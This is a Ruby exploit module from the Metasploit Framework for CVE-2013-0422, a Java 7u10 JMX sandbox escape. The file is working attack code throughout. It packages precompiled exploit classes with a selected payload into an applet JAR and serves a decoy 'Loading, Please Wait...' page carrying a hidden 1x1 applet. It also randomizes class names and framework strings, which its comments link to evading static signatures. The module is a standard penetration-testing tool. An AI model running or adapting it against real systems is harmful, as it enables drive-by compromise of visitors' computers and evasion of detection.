GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/multi/browser/java_jre17_jmxbean.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
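class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE

  include Msf::Exploit::Remote::BrowserAutopwn
  autopwn_info({ javascript: false })

  # Registers module metadata.
  #
  # The sandbox escape itself is not in this file: it is the precompiled
  # Exploit.class / B.class pair that #setup loads from
  # data/exploits/cve-2013-0422. This module only packages them with the
  # selected payload into an applet JAR and serves a landing page that loads it.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Java Applet JMX Remote Code Execution',
        'Description' => %q{
          This module abuses the JMX classes from a Java Applet to run arbitrary Java
          code outside of the sandbox as exploited in the wild in January of 2013. The
          vulnerability affects Java version 7u10 and earlier.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Unknown', # Vulnerability discovery
          'egypt', # Metasploit module
          'sinn3r', # Metasploit module
          'juan vazquez' # Metasploit module
        ],
        'References' => [
          [ 'CVE', '2013-0422' ],
          [ 'OSVDB', '89059' ],
          [ 'US-CERT-VU', '625617' ],
          [ 'URL', 'http://malware.dontneedcoffee.com/2013/01/0-day-17u10-spotted-in-while-disable.html' ],
          [ 'URL', 'http://labs.alienvault.com/labs/index.php/2013/new-year-new-java-zeroday/' ],
          [ 'URL', 'http://pastebin.com/cUG2ayjh' ] # Who authored the code on pastebin? I can't read Russian :-(
        ],
        # 'Space' caps the size of the generated payload; NOP sleds have no
        # meaning for a JAR delivery, hence DisableNops.
        'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
        'Targets' => [
          [
            'Generic (Java Payload)',
            {
              'Platform' => ['java'],
              'Arch' => ARCH_JAVA
            }
          ],
          [
            'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch' => ARCH_X86
            }
          ],
          [
            'Mac OS X x86 (Native Payload)',
            {
              'Platform' => 'osx',
              'Arch' => ARCH_X86
            }
          ],
          [
            'Linux x86 (Native Payload)',
            {
              'Platform' => 'linux',
              'Arch' => ARCH_X86
            }
          ],
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2013-01-10',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # Loads the two precompiled applet classes and randomizes the name of the
  # entry-point class.
  #
  # The replacement name is generated with exactly the same length as
  # 'Exploit', so the byte-level gsub! on the class file keeps every
  # length-prefixed constant-pool string valid (the same trick is used for the
  # JAR entries in #build_applet_jar). A fresh name per server instance means
  # the served class name is not constant -- presumably to defeat trivial
  # static signatures on the JAR.
  #
  # @raise [Errno::ENOENT] if either data file is missing from the install
  def setup
    data_dir = File.join(Msf::Config.data_directory, 'exploits', 'cve-2013-0422')
    @exploit_class = File.binread(File.join(data_dir, 'Exploit.class'))
    @loader_class = File.binread(File.join(data_dir, 'B.class'))

    @exploit_class_name = rand_text_alpha('Exploit'.length)
    @exploit_class.gsub!('Exploit', @exploit_class_name)
    super
  end

  # HTTP request dispatcher for the exploit server.
  #
  # Three request shapes are served:
  # * a URI ending in ".jar" gets the applet archive from #build_applet_jar;
  # * a URI ending in "/" gets the landing page from #generate_html, once the
  #   payload has been regenerated for that client (404 if that fails);
  # * anything else is redirected to the resource root with a trailing "/".
  #
  # The URI tests are anchored with \z rather than $: `$` also matches just
  # before a trailing newline, so "\z" is the correct end-of-string anchor
  # when classifying a whole request URI.
  #
  # @param cli the connected client
  # @param request the parsed HTTP request (only #uri is used)
  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar\z/i
      send_response(cli, build_applet_jar, { 'Content-Type' => 'application/octet-stream' })
    when %r{/\z}
      payload = regenerate_payload(cli)
      if !payload
        print_error('Failed to generate the payload.')
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource + '/', '')
    end
  end

  # Assembles the applet JAR served to the browser.
  #
  # Starts from the payload's encoded JAR, adds the randomized exploit class
  # and the B loader class, then rewrites the framework's recognisable
  # "metasploit" / "Payload" strings in both entry names and entry bytes.
  # The replacements are the same length as the originals so that
  # length-prefixed class-file structures stay valid after the rewrite.
  # B.class keeps its fixed name -- presumably because the precompiled
  # exploit class references it by that name.
  #
  # @return the jar object returned by payload.encoded_jar, with its
  #   manifest generated
  def build_applet_jar
    jar = payload.encoded_jar
    jar.add_file("#{@exploit_class_name}.class", @exploit_class)
    jar.add_file('B.class', @loader_class)

    metasploit_str = rand_text_alpha('metasploit'.length)
    payload_str = rand_text_alpha('payload'.length)
    jar.entries.each do |entry|
      entry.name.gsub!('metasploit', metasploit_str)
      entry.name.gsub!('Payload', payload_str)
      entry.data = entry.data.gsub('metasploit', metasploit_str)
      entry.data = entry.data.gsub('Payload', payload_str)
    end
    jar.build_manifest
    jar
  end

  # Landing page: a minimal document whose only content is a 1x1 applet tag.
  #
  # The archive name is random on every request (any URI ending in ".jar" is
  # served by #on_request_uri) and the code attribute names the randomized
  # class chosen in #setup.
  #
  # @return [String] the HTML document
  def generate_html
    archive = "#{rand_text_alpha(8)}.jar"
    html = %(<html><head><title>Loading, Please Wait...</title></head>)
    html << %(<body><center><p>Loading, Please Wait...</p></center>)
    html << %(<applet archive="#{archive}" code="#{@exploit_class_name}.class" width="1" height="1">)
    html << %(</applet></body></html>)
    html
  end
end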